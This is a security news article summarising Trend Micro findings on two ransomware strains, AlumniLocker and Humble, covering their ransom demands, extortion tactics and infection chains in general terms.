Beware of ‘AlumniLocker’ and ‘Humble,’ Two New Ransomware Strains

  • Two new ransomware strains are being actively distributed out there, and they are both very effective.
  • The first one is already operating on a high level, demanding a lot of money and threatening with data publication.
  • The second appears to be going through a testing phase, demanding a small, almost symbolic amount.

Researchers at Trend Micro have sampled two new ransomware variants, namely the “AlumniLocker” and “Humble,” which exhibit worryingly sophisticated post-encryption techniques. The first strain is put in the same category as established players in the field, as it’s asking for high ransom amounts and features a data leak portal for extortion right from the beginning of its operation.

This is a very alarming finding in general, as it shows that ransomware actors now treat the double-extortion of data stealing and data encryption as a standard requirement.

AlumniLocker appears to be a variant of the Thanos ransomware family, and its operators are asking for a ransom payment of 10 bitcoins. The victims are threatened that if they don’t send the requested amount within 48 hours, their data will be published on the actor’s leak site. That’s a pretty short time for such a large amount of money.

Source: Trend Micro

The infection channel for AlumniLocker is typically a PDF file that arrives via email as an attachment. Usually, the subject has something to do with an invoice that supposedly requires the recipient’s attention.

Inside the PDF, there’s a URL link. If clicked, it downloads the ZIP archive – which contains the downloader. This activates a PowerShell script, and finally, the ransomware payload is fetched and executed through a BITS module.

The second new strain, Humble, first appeared in the wild in February 2021, compiled with an executable wrapper and utilizing a public webhook service from Discord for infection reporting. Humble is very aggressive as it doesn’t even allow explorer.exe to access or view local storage drives, while it also threatens the victims that if they dare to restart their machine, it will rewrite the master boot record (MBR).

Source: Trend Micro

The malware abuses the Windows certificates service to generate a key from a randomized input and then use it on the “extd.exe” component to encrypt the victim’s files. In total, Humble targets 104 file types including .exe, .pdf, .mp3, .jpeg, .cc, .java, and .sys.

Humble’s ransom demand is pretty low, at just 0.0002 bitcoins, and the time to pay is a “comfortable” five days. The operators may have set the ransom amount so low because they are only testing out their payment processing system, so they need to ensure that the victims actually pay. That said, we may soon see Humble demands getting upgraded, as it’s very unlikely that the actors will focus their targeting on home users.

REVIEW OVERVIEW

Latest

Pinelands Regional School District Announced Data Breach

Pinelands Regional School District concluded an investigation about a data breach they had in March this year.The breach happened using then board...

Banking Trojan Targets 100 Organizations in Brazil

A banking trojan from Latin America was found targeting almost 100 Brazilian organizations and individuals.The malware was first noticed in late August...

The Number of Phishing Emails Impersonating Craigslist Is Growing

Craigslist Gsuite & Microsoft users are being targeted with phishing emails that present a fake user login page.These emails rely on brand...
For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: Chrome, Edge, Firefox, Safari